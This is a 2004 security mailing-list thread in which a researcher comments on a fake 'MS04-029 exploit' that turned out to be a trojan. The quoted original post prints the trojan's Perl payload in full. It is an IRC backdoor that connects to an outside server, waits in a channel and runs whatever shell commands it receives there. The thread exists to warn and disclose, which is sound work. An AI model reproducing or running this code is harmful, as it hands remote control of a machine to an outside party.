MS04-029 Exploit = trojan!

[alekc at avet.com.pl (Aleksander P. Czarnowski)]

The sad or funny part (depends on your sens of humore) is that even if don't bother reading exploit source code before 
running it you can still see perl script with simple strings command run against binary. They could a least try to hide 
it a bit better on source code and binary level - after all tools like metasploit framework are used by people who can 
read assembly too ;-)
Just my 2 cents,
Aleksander Czarnowski
AVET INS
 
-----Original Message-----
From: Jerome ATHIAS [mailto:jerome.athias at caramail.com]
Sent: Wednesday, November 03, 2004 11:09 PM
To: framework 
Subject: [framework] MS04-029 Exploit = trojan!


#!/usr/bin/perl
$chan="#0x";$nick="k";$server="ir3ip.net";$SIG{TERM}={};exit
if fork;use 
IO::Socket;$sock = IO::Socket::INET->new($server.":6667")||exit;print

$sock "USER k +i k :kv1\nNICK k\n";$i=1;while(<$sock>=~/^[^
]+ ([^ ]+) 
/){$mode=$1;last if 
$mode=="001";if($mode=="433"){$i++;$nick=~s/\d*$/$i/;print
$sock "NICK 
$nick\n";}}print $sock "JOIN $chan\nPRIVMSG $chan 
:Hi\n";while(<$sock>){if (/^PING (.*)$/){print $sock "PONG
$1\nJOIN 
$chan\n";}if(s/^[^ ]+ PRIVMSG $chan :$nick[^ :\w]*:[^ :\w]* 
(.*)$/$1/){s/\s*$//;$_=`$_`;foreach(split "\n"){print $sock "PRIVMSG

$chan :$_\n";sleep 1;}}}#/tmp/hi


Doh! bad shit yes
SORRY guys - too fast - too bad


 C est le moment de dynamiser votre bo?te mail en cliquant ici !